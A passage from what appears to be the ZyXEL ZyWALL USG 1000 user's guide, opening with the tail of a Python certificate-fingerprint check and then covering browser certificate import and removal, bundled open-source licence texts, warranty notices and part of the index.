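    der = fetch_der_certificate(host, port)
    seen = sha256_fingerprint(der)
    print("presented SHA-256:", ":".join(seen[i:i + 2] for i in range(0, len(seen), 2)).upper())
    if fingerprint_matches(der, EXPECTED_SHA256):
        print("fingerprint matches; safe to import this certificate")
        return 0
    print("MISMATCH: do not import; check the device over the console before trusting anything")
    return 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

The hash is taken over the DER bytes exactly as presented, so a certificate that differs in a single byte (a different key, a different issuer, a re-signed copy) produces a different value; a match therefore tells you the browser dialogs that follow are importing the certificate you already verified, and a mismatch tells you to stop before clicking through any of them.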

Page 988: ...the first time you browse to it, you are presented with a certification error. Figure 587 Internet Explorer 7: Certification Error. 2. Click Continue to this website (not recommended). Figure 588 Internet Explorer 7: Certification Error. 3. In the Address Bar, click Certificate Error > View certificates. Figure 589 Internet Explorer 7: Certificate Error...

Page 989: ...4. In the Certificate dialog box, click Install Certificate. Figure 590 Internet Explorer 7: Certificate. 5. In the Certificate Import Wizard, click Next. Figure 591 Internet Explorer 7: Certificate Import Wizard...

Page 990: ...matically select certificate store based on the type of certificate, click Next again and then go to step 9. Figure 592 Internet Explorer 7: Certificate Import Wizard. 7. Otherwise, select Place all certificates in the following store and then click Browse. Figure 593 Internet Explorer 7: Certificate Import Wizard...

Page 991: ...t Certificate Store dialog box, choose a location in which to save the certificate and then click OK. Figure 594 Internet Explorer 7: Select Certificate Store. 9. In the Completing the Certificate Import Wizard screen, click Finish. Figure 595 Internet Explorer 7: Certificate Import Wizard...

Page 992: ...lly, click OK when presented with the successful certificate installation message. Figure 597 Internet Explorer 7: Certificate Import Wizard. 12. The next time you start Internet Explorer and go to a ZyXEL Web Configurator page, a sealed padlock icon appears in the address bar. Click it to view the page's Website Identification information. Figure 598 Internet Explorer 7: Website Identification...

Page 993: ...one has been issued to you. 1. Double-click the public key certificate file. Figure 599 Internet Explorer 7: Public Key Certificate File. 2. In the security warning dialog box, click Open. Figure 600 Internet Explorer 7: Open File Security Warning. 3. Refer to steps 4 to 12 in the Internet Explorer procedure beginning on page 987 to complete the installation process. Removing a Certificate in Internet Explorer...

Page 994: ...1. Open Internet Explorer and click Tools > Internet Options. Figure 601 Internet Explorer 7: Tools Menu. 2. In the Internet Options dialog box, click Content > Certificates. Figure 602 Internet Explorer 7: Internet Options...

Page 995: ...icates Authorities tab, select the certificate that you want to delete and then click Remove. Figure 603 Internet Explorer 7: Certificates. 4. In the Certificates confirmation, click Yes. Figure 604 Internet Explorer 7: Certificates. 5. In the Root Certificate Store dialog box, click Yes. Figure 605 Internet Explorer 7: Root Certificate Store...

Page 996: ...following example uses Mozilla Firefox 2 on Windows XP Professional; however, the screens can also apply to Firefox 2 on all platforms. 1. If your device's Web Configurator is set to use SSL certification, then the first time you browse to it you are presented with a certification error. 2. Select Accept this certificate permanently and click OK. Figure 606 Firefox 2: Website Certified by an Unknown Autho...

Page 997: ...the address bar, which you can click to open the Page Info > Security window to view the web page's security information. Figure 607 Firefox 2: Page Info. Installing a Stand-Alone Certificate File in Firefox: rather than browsing to a ZyXEL Web Configurator and installing a public key certificate when prompted, you can install a stand-alone certificate file if one has been issued to you...

Page 998: ...1. Open Firefox and click Tools > Options. Figure 608 Firefox 2: Tools Menu. 2. In the Options dialog box, click Advanced > Encryption > View Certificates. Figure 609 Firefox 2: Options...

Page 999: ...tes > Import. Figure 610 Firefox 2: Certificate Manager. 4. Use the Select File dialog box to locate the certificate and then click Open. Figure 611 Firefox 2: Select File. 5. The next time you visit the web site, click the padlock in the address bar to open the Page Info > Security window to see the web page's security information...

Page 1000: ...ing a Certificate in Firefox: this section shows you how to remove a public key certificate in Firefox 2. 1. Open Firefox and click Tools > Options. Figure 612 Firefox 2: Tools Menu. 2. In the Options dialog box, click Advanced > Encryption > View Certificates. Figure 613 Firefox 2: Options...

Page 1001: ...e. Figure 614 Firefox 2: Certificate Manager. 4. In the Delete Web Site Certificates dialog box, click OK. Figure 615 Firefox 2: Delete Web Site Certificates. 5. The next time you go to the web site that issued the public key certificate you just removed, a certification error appears. Opera: the following example uses Opera 9 on Windows XP Professional; however, the screens can apply to Opera 9 on all platform...

Page 1002: ...time you browse to it, you are presented with a certification error. 2. Click Install to accept the certificate. Figure 616 Opera 9: Certificate signer not found. 3. The next time you visit the web site, click the padlock in the address bar to open the Security information window to view the web page's security details. Figure 617 Opera 9: Security information...

Page 1003: ...nd-Alone Certificate File in Opera: rather than browsing to a ZyXEL Web Configurator and installing a public key certificate when prompted, you can install a stand-alone certificate file if one has been issued to you. 1. Open Opera and click Tools > Preferences. Figure 618 Opera 9: Tools Menu...

Page 1004: ...2. In Preferences, click Advanced > Security > Manage certificates. Figure 619 Opera 9: Preferences...

Page 1005: ...3. In the Certificates Manager, click Authorities > Import. Figure 620 Opera 9: Certificate manager. 4. Use the Import certificate dialog box to locate the certificate and then click Open. Figure 621 Opera 9: Import certificate...

Page 1006: ...nstall authority certificate. 6. Next, click OK. Figure 623 Opera 9: Install authority certificate. 7. The next time you visit the web site, click the padlock in the address bar to open the Security information window to view the web page's security details. Removing a Certificate in Opera: this section shows you how to remove a public key certificate in Opera 9...

Page 1007: ...1. Open Opera and click Tools > Preferences. Figure 624 Opera 9: Tools Menu. 2. In Preferences, click Advanced > Security > Manage certificates. Figure 625 Opera 9: Preferences...

Page 1008: ...ificate you just removed, a certification error appears. Note: there is no confirmation when you delete a certificate authority, so be absolutely certain that you want to go through with it before clicking the button. Konqueror: the following example uses Konqueror 3.5 on openSUSE 10.3; however, the screens apply to Konqueror 3.5 on all Linux KDE distributions. 1. If your device's Web Configurator is set to...

Page 1009: ...nqueror 3.5: Server Authentication. 3. Click Forever when prompted to accept the certificate. Figure 628: Konqueror 3.5: Server Authentication. 4. Click the padlock in the address bar to open the KDE SSL Information window and view the web page's security details. Figure 629: Konqueror 3.5: KDE SSL Information ...

Page 1010: ...en prompted, you can install a stand-alone certificate file if one has been issued to you. 1. Double-click the public key certificate file. Figure 630: Konqueror 3.5: Public Key Certificate File. 2. In the Certificate Import Result - Kleopatra dialog box, click OK. Figure 631: Konqueror 3.5: Certificate Import Result. The public key certificate appears in the KDE certificate manager, Kleopatra. Figure 632: Konquero...

Page 1011: ...s security details. Removing a Certificate in Konqueror. This section shows you how to remove a public key certificate in Konqueror 3.5. 1. Open Konqueror and click Settings > Configure Konqueror. Figure 633: Konqueror 3.5: Settings Menu. 2. In the Configure dialog box, select Crypto. 3. On the Peer SSL Certificates tab, select the certificate you want to delete and then click Remove. Figure 634: Konqueror 3.5: Con...

Page 1012: ...e next time you go to the web site that issued the public key certificate you just removed, a certification error appears. Note: There is no confirmation when you remove a certificate authority, so be absolutely certain you want to go through with it before clicking the button ...

Page 1013: ...LISTED IN THE NOTICE OR APPENDIX BELOW, ZYXEL MAY HAVE DISTRIBUTED TO YOU HARDWARE AND/OR SOFTWARE, OR MADE AVAILABLE FOR ELECTRONIC DOWNLOADS, THESE FREE SOFTWARE PROGRAMS OF THIRD PARTIES, AND YOU ARE LICENSED TO FREELY COPY, MODIFY AND REDISTRIBUTE THAT SOFTWARE UNDER THE APPLICABLE LICENSE TERMS OF SUCH THIRD PARTY. NONE OF THE STATEMENTS OR DOCUMENTATION FROM ZYXEL, INCLUDING ANY RESTRICTIONS OR COND...

Page 1014: ...ntenance, technical or other support for the resultant modified Software. You may not copy, reverse engineer, decompile, reverse compile, translate, adapt, or disassemble the Software or any part thereof, nor shall you attempt to create the source code from the object code for the Software. Except as and only to the extent expressly permitted in this License, you may not market, co-brand, and private label or ...

Page 1015: ...EE OR IN AN UNINTERRUPTED FASHION, OR THAT ANY DEFECTS OR ERRORS IN THE SOFTWARE WILL BE CORRECTED, OR THAT THE SOFTWARE IS COMPATIBLE WITH ANY PARTICULAR PLATFORM. SOME JURISDICTIONS DO NOT ALLOW THE WAIVER OR EXCLUSION OF IMPLIED WARRANTIES, SO THEY MAY NOT APPLY TO YOU. IF THIS EXCLUSION IS HELD TO BE UNENFORCEABLE BY A COURT OF COMPETENT JURISDICTION, THEN ALL EXPRESS AND IMPLIED WARRANTIES SHALL BE ...

Page 1016: ...ate this License Agreement for any reason, including but not limited to if ZyXEL finds that you have violated any of the terms of this License Agreement. Upon notification of termination, you agree to destroy or return to ZyXEL all copies of the Software and Documentation, and to certify in writing that all known copies, including backup copies, have been destroyed. All provisions relating to confidentia...

Page 1017: ...ce. Companies, names, and data used in examples herein are fictitious unless otherwise noted. No part may be reproduced or transmitted in any form or by any means, electronic or mechanical, for any purpose, except the express written permission of ZyXEL Communications Corporation. This Product includes ppp software under the PPP License. PPP License: Copyright (c) 1993 The Australian National University. All r...

Page 1018: ...cense. Netkit Telnet License: Copyright (c) 1989 Regents of the University of California. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary fo...

Page 1019: ...ies, and that both the copyright notice and this permission notice appear in supporting documentation, and that the name University of Delaware not be used in advertising or publicity pertaining to distribution of the software without specific, written prior permission. The University of Delaware makes no representations about the suitability of this software for any purpose. It is provided "as is" without ...

Page 1020: ... under an X11-style License. An X11-style license: This is a Free Software License. This license is compatible with The GNU General Public License, Version 1. This license is compatible with The GNU General Public License, Version 2. This is just like a Simple Permissive license, but it requires that a copyright notice be maintained. ________________________________________ Permission is hereby granted...

Page 1021: ...ource licenses. In case of any license issues related to OpenSSL, please contact openssl-core@openssl.org. OpenSSL License: Copyright (c) 1998-2008 The OpenSSL Project. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this l...

Page 1022: ...derived from this software without prior written permission. For written permission, please contact openssl-core@openssl.org. 5. Products derived from this software may not be called "OpenSSL" nor may "OpenSSL" appear in their names without prior written permission of the OpenSSL Project. 6. Redistributions of any form whatsoever must retain the following acknowledgment: "This product includes software develo...

Page 1023: ...F USE, DATA, OR PROFITS, OR BUSINESS INTERRUPTION, HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT, INCLUDING NEGLIGENCE OR OTHERWISE, ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. This product includes cryptographic software written by Eric Young (eay@cryptsoft.com). This product includes software written by ...

Page 1024: ...is Tim Hudson (tjh@cryptsoft.com). Copyright remains Eric Young's, and as such any Copyright notices in the code are not to be removed. If this package is used in a product, Eric Young should be given attribution as the author of the parts of the library used. This can be in the form of a textual message at program startup or in documentation (online or textual) provided with the package. Redistribution and...

Page 1025: ...ctory (application code) you must include an acknowledgement: "This product includes software written by Tim Hudson (tjh@cryptsoft.com)". THIS SOFTWARE IS PROVIDED BY ERIC YOUNG "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE FOR ANY ...

Page 1026: ...are under a 3-clause BSD License. A 3-clause BSD-style license: This is a Free Software License. This license is compatible with The GNU General Public License, Version 1. This license is compatible with The GNU General Public License, Version 2. This is the BSD license without the obnoxious advertising clause. It's also known as the modified BSD license. Note that the University of California now pref...

Page 1027: ...erived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTA...

Page 1028: ...EQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. $Id: COPYRIGHT,v 1.6.2.2 2002/02/12 06:05:48 marka Exp $ Portions Copyright (C) 1996-2001 Nominum, Inc. Permission to use, copy, modify, and distribute this software for any purp...

Page 1029: ...y granted, provided that the above copyright notice and this permission notice appear in all copies. THE SOFTWARE IS PROVIDED "AS IS" AND ISC DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL ISC BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DA...

Page 1030: ...anagement of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License. "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentatio...

Page 1031: ...k. 2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form. 3. Grant of Patent License. Sub...

Page 1032: ...atement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License. 5. Submission of Contributions. Unless You explicitly state otherwise, any Cont...

Page 1033: ...ontributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS. Version 1.1. Copyright (c) 1999-2003 The Apache Software Foundation. All rights reserved. Redistribution and use in source and binary forms, with ...

Page 1034: ... PROFITS, OR BUSINESS INTERRUPTION, HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT, INCLUDING NEGLIGENCE OR OTHERWISE, ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. This software consists of voluntary contributions made by many individuals on behalf of the Apache Software Foundation. For more information ...

Page 1035: ...m of use, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish); that you receive source code or can get it if you want it; that you can change the software and use pieces of it in new free programs; and that you are informed that you can do these things. To protect your rights, we need to m...

Page 1036: ...ral Public License therefore permits such linking only if the entire combination fits its criteria of freedom. The Lesser General Public License permits more lax criteria for linking other code with the library. We call this license the "Lesser" General Public License because it does Less to protect the user's freedom than the ordinary General Public License. It also provides other free software develo...

Page 1037: ...or any derivative work under copyright law: that is to say, a work containing the Library or a portion of it, either verbatim or with modifications and/or translated straightforwardly into another language. (Hereinafter, translation is included without limitation in the term "modification".) "Source code" for a work means the preferred form of the work for making modifications to it. For a library, complete sou...

Page 1038: ...ntifiable sections of that work are not derived from the Library, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Library, the distribution of the whole must be on the terms of...

Page 1039: ...be a derivative work of the Library even though the source code is not. Whether this is true is especially significant if the work can be linked without the Library, or if the work is itself a library. The threshold for this to be true is not precisely defined by law. If such an object file uses only numerical parameters, data structure layouts and accessors, and small macros and small inline functions ...

Page 1040: ...eived a copy of these materials or that you have already sent this user a copy. For an executable, the required form of the "work that uses the Library" must include any data and utility programs needed for reproducing the executable from it. However, as a special exception, the materials to be distributed need not include anything that is normally distributed (in either source or binary form) with the maj...

Page 1041: ...t contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Library at all. For example, if a patent license would not permit royalty-free redistribution of the Library by all those...

Page 1042: ...Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY. 15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED ...

Page 1043: ... designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software, to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. Some other Free Software Foun...

Page 1044: ...ar that any patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION. 0. This License applies to any program or other work which contains a notice placed by the copyright holder saying it may be distributed under the terms of this General Publ...

Page 1045: ...such an announcement, your work based on the Program is not required to print an announcement. These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Program, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate w...

Page 1046: ...lent access to copy the source code from the same place counts as distribution of the source code, even though third parties are not compelled to copy the source along with the object code. 4. You may not copy, modify, sublicense, or distribute the Program except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense or distribute the Program is void, and will automatica...

Page 1047: ...n is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 8. If the distribution and/or use of the Program is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Program under this License may add an explicit geographical distribution limitation excluding those countries, so that dis...

Page 1048: ...Y OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE PROGRAM, INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OT...

Page 1049: ...tified as the Initial Developer in the Source Code notice required by Exhibit A. 1.7. "Larger Work" means a work which combines Covered Code or portions thereof with code not governed by the terms of this License. 1.8. "License" means this document. 1.8.1. "Licensable" means having the right to grant, to the maximum extent possible, whether at the time of the initial grant or subsequently acquired, any and all o...

Page 1050: ...12. "You" (or "Your") means an individual or a legal entity exercising rights under, and complying with all of the terms of, this License or a future version of this License issued under Section 6.1. For legal entities, "You" includes any entity which controls, is controlled by, or is under common control with You. For purposes of this definition, "control" means (a) the power, direct or indirect, to cause the directio...

Page 1051: ...therwise dispose of: 1) Modifications made by that Contributor (or portions thereof); and 2) the combination of Modifications made by that Contributor with its Contributor Version (or portions of such combination). The licenses granted in Sections 2.2(a) and 2.2(b) are effective on the date Contributor first makes Commercial Use of the Covered Code. Notwithstanding Section 2.2(b) above, no patent license is gra...

Page 1052: ...rived, directly or indirectly, from Original Code provided by the Initial Developer and including the name of the Initial Developer in (a) the Source Code, and (b) in any notice in an Executable version or related documentation in which You describe the origin or ownership of the Covered Code. 3.4. Intellectual Property Matters. (a) Third Party Claims. If Contributor has knowledge that a license under a third ...

Page 1053: ...utor as a result of warranty, support, indemnity or liability terms You offer. 3.6. Distribution of Executable Versions. You may distribute Covered Code in Executable form only if the requirements of Sections 3.1, 3.2, 3.3, 3.4 and 3.5 have been met for that Covered Code, and if You include a notice stating that the Source Code version of the Covered Code is available under the terms of this License, includ...

Page 1054: ...Netscape may publish revised and/or new versions of the License from time to time. Each version will be given a distinguishing version number. 6.2. Effect of New Versions. Once Covered Code has been published under a particular version of the License, You may always continue to use it under the terms of that version. You may also choose to use such Covered Code under the terms of any subsequent version ...

Page 1055: ...loper or a Contributor (the Initial Developer or Contributor against whom You file such action is referred to as "Participant") alleging that such Participant's Contributor Version directly or indirectly infringes any patent, then any and all rights granted by such Participant to You under Sections 2.1 and/or 2.2 of this License shall, upon 60 days notice from Participant, terminate prospectively, unless ...

Page 1056: ...'s negligence to the extent applicable law prohibits such limitation. Some jurisdictions do not allow the exclusion or limitation of incidental or consequential damages, so this exclusion and limitation may not apply to you. 10. U.S. government end users. The Covered Code is a "commercial item," as that term is defined in 48 C.F.R. 2.101 (Oct. 1995), consisting of "commercial computer software" and "commercial com...

Page 1057: ...vered Code under Your choice of the MPL or the alternative licenses, if any, specified by the Initial Developer in the file described in Exhibit A. Exhibit A: Mozilla Public License. The contents of this file are subject to the Mozilla Public License Version 1.1 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.mozilla.org/MPL/ S...

Page 1058: ...appropriate to package. The Regents of the University of California. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. Redistributions in binary form must reproduce the ...

Page 1059: ...he Software, to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of ...

Page 1060: ...n of the license. THIS SOFTWARE IS PROVIDED BY THE OPENLDAP FOUNDATION AND ITS CONTRIBUTORS "AS IS" AND ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OPENLDAP FOUNDATION, ITS CONTRIBUTORS, OR THE AUTHOR(S) OR OWNER(S) OF THE SOFTWARE BE LIABLE FOR ANY DIRECT, INDIRECT, INCI...

Page 1061: ...g to PNG copyright 1999, 2000, 2001, 2002 Greg Roelofs. Portions relating to gdttf.c copyright 1999, 2000, 2001, 2002 John Ellson (ellson@lucent.com). Portions relating to gdft.c copyright 2001, 2002 John Ellson (ellson@lucent.com). Portions copyright 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007 Pierre-Alain Joye (pierre@libgd.org). Portions relating to JPEG and to color quantization copyright 2000, 2001, 2002 Doug Becker...

Page 1062: ...oftware http://www.millstream.com.au/view/code/tablekit Version 1.2.1 2007-03-11. Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to p...

Page 1063: ... required. 2. Altered source versions must be plainly marked as such, and must not be misrepresented as being the original software. 3. This notice may not be removed or altered from any source distribution. L. Peter Deutsch ghost@aladdin.com. This Product includes libpng software under the below License: Copyright (c) <year> <copyright holders>. This software is provided "as is", without any express or implied warra...

Page 1064: ...gust 15, 2004, through 1.2.12, June 27, 2006, are Copyright (c) 2004-2006 Glenn Randers-Pehrson, and are distributed according to the same disclaimer and license as libpng-1.2.5 with the following individual added to the list of Contributing Authors: Cosmin Truta. libpng versions 1.0.7, July 1, 2000, through 1.2.5, October 3, 2002, are Copyright (c) 2000-2002 Glenn Randers-Pehrson, and are distributed according to t...

Page 1065: ...th the user. libpng versions 0.97, January 1998, through 1.0.6, March 20, 2000, are Copyright (c) 1998, 1999, 2000 Glenn Randers-Pehrson, and are distributed according to the same disclaimer and license as libpng-0.96, with the following individuals added to the list of Contributing Authors: Tom Lane, Glenn Randers-Pehrson, Willem van Schaik. libpng versions 0.89, June 1996, through 0.96, May 1997, are Copyright (c) 19...

Page 1066: ... Eric Schalnat, Paul Schmidt, Tim Wegner. The PNG Reference Library is supplied "AS IS". The Contributing Authors and Group 42, Inc. disclaim all warranties, expressed or implied, including, without limitation, the warranties of merchantability and of fitness for any purpose. The Contributing Authors and Group 42, Inc. assume no liability for direct, indirect, incidental, special, exemplary, or consequential damages ...

Page 1067: ...ng Authors and Group 42, Inc. specifically permit, without fee, and encourage the use of this source code as a component to supporting the PNG file format in commercial products. If you use this source code in a product, acknowledgment is not required but would be appreciated. This Product includes ftp-tls software under the below License: Copyright (C) 1997 and 1998 WIDE Project. All rights reserved. Redistr...

Page 1068: ...RWISE ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. Copyright (c) 1985, 1989, 1993, 1994 The Regents of the University of California. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above co...

Page 1069: ...copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. All advertising materials mentioning features or use of this software must display the following acknowledgement: This product includes software developed by the NetBSD Foundation, Inc. and its contributors. 4. Neither the name of The NetBSD Foundation nor t...

Page 1070: ...Appendix E: Open Software Announcements. ZyWALL USG 1000 User's Guide 1070 ...

Page 1071: ...ion or use of any products or software described herein. Neither does it convey any license under its patent rights nor the patent rights of others. ZyXEL further reserves the right to make changes in any products described herein without notice. This publication is subject to change without notice. Your use of the ZyWALL is subject to the terms and conditions of any related service providers. Trademar...

Page 1072: ...ill not occur in a particular installation. If this device does cause harmful interference to radio/television reception, which can be determined by turning the device off and on, the user is encouraged to try to correct the interference by one or more of the following measures: 1. Reorient or relocate the receiving antenna. 2. Increase the separation between the equipment and the receiver. 3. Connect the ...

Page 1073: ...ty Period of this product. During the warranty period, and upon proof of purchase, should the product have indications of failure due to faulty workmanship and/or materials, ZyXEL will, at its discretion, repair or replace the defective products or components without charge for either parts or labor, and to whatever extent it shall deem necessary to restore the product or components to proper operating c...

Page 1074: ...is warranty, contact your vendor. You may also refer to the warranty policy for the region in which you bought the device at http://www.zyxel.com/web/support_warranty_info.php. Registration: Register your product online to receive e-mail notices of firmware upgrades and information at www.zyxel.com ...

Page 1075: ...om page 814; forcing login 418; idle timeout 709; logging in 418; multiple logins 710; see also users 700; Web Configurator 712. access users: see also force user authentication policies. account: myZyXEL.com 267; user 699. accounting server 733. Active Directory: see AD. active protocol 478: AH 478; and encapsulation 479; ESP 478. active sessions 212, 218, 233. ActiveX 648. AD 733, 736, 737, 739, 740: directory structure 73...

Page 1076: ...PBX on DMZ tutorial 155; peer-to-peer calls 405; RTP 410; see also VoIP pass through 404; SIP 404; tutorial 148. Anomaly Detection and Prevention: see ADP. answer rings 839. anti-spam 659, 665: action for spam mails 665; alerts 664; black list 660, 665; concurrent e-mail sessions 259, 662; configuration overview 111; DNSBL 661, 665, 670; e-mail header buffer 661; e-mail headers 660; excess e-mail sessions 662; general se...

Page 1077: ... activation 268; troubleshooting 891, 896, 901; troubleshooting signatures update 890; unidentified applications 546; updating signatures 273; vs firewall 425, 427. applications 41. AppPatrol: see application patrol 273. ASAS (Authenex Strong Authentication System) 734. ASCII encoding 621. ASCII encoding attacks 621. asymmetrical routes 433: allowing through the firewall 435; vs virtual interfaces 433. AT command str...

Page 1078: ...hen used 327. B. backdoor attacks 581. backing up configuration files 866. backslashes 622. bad length options attack 623. bandwidth: egress 305; ingress 305; usage statistics 242. bandwidth limit: troubleshooting 893. bandwidth management 527: and policy routes 357; behavior 531; configured rate, effect 532; examples 533; in application patrol 529; interface outbound, see interfaces, interface's bandwidth 534; maximiz...

Page 1079: ...onization, device HA 697; and VPN gateways 446; and WWW 812; certification path 750, 760, 766; expired 750; factory default 751; file formats 751; fingerprints 761, 767; importing 754; in IPSec 462; not used for encryption 750; revoked 750; self-signed 750, 756; serial number 760, 767; storage space 753, 763; thumbprint algorithms 752; thumbprints 752; used for authentication 750; verifying fingerprints 751; where used 112...

Page 1080: ...s 627; and users 627; by category 628, 638; by keyword in URL 628, 649; by URL 628, 648; by web feature 628, 648; cache 255, 650; categories 638; category service 636; configuration overview 110; default policy 628, 630; external web filtering service 636, 650; filter list 628; managed web pages 637; message for blocked access 631; policies 627, 628; prerequisites 110; registration status 270, 632, 636; reports, see content f...

Page 1081: ... 697; synchronization password 685, 689; synchronization port number 684, 689; troubleshooting 901, 903; tutorial 162; virtual router 680; virtual router and management IP addresses 681; VRID 689. device High Availability: see device HA 677. device introduction 33. DHCP 333, 794: and DNS servers 334; and domain name 794; and interfaces 333; client list 219; pool 334; static DHCP 334. DHCP table 219. diagnostics 114, 875 ...

Page 1082: ...statistics report 846; header buffer 661; headers 660; virus 567. eMule 580. Encapsulating Security Payload: see ESP. encapsulation: and active protocol 479; IPSec 451; transport mode 478; tunnel mode 478; VPN 478. encryption: and anti-virus 561; in L2TP VPN 177, 186, 202; IPSec 452; RSA 760. encryption algorithms 473: 3DES 473; AES 473; and active protocol 473; DES 473. encryption method 773. end of IP list 588. end point...

Page 1083: ...and SIP ALG 405; and user groups 438, 441; and users 438, 441; and VoIP pass through 406; and zones 426, 436; asymmetrical routes 433, 435; configuration overview 107; global rules 427; prerequisites 107; priority 436; rule criteria 427; session limits 428, 438; to-device, see to-device firewall; triangle routes 433, 435; troubleshooting 891; vs application patrol 425, 427. firmware: and restart 871; boot module, see boot m...

Page 1084: ... 810; authenticating clients 810; avoiding warning messages 819; example 818; vs HTTP 810; with Internet Explorer 818; with Netscape Navigator 819. hub-and-spoke IPSec VPN, VPN hub-and-spoke 129. hub-and-spoke VPN: see VPN concentrator. HyperText Transfer Protocol over Secure Socket Layer: see HTTPS. I. ICMP 722: code 594; datagram length 624; decoder 613, 621; echo 619; flood attack 619; portsweep 618; sequence number...

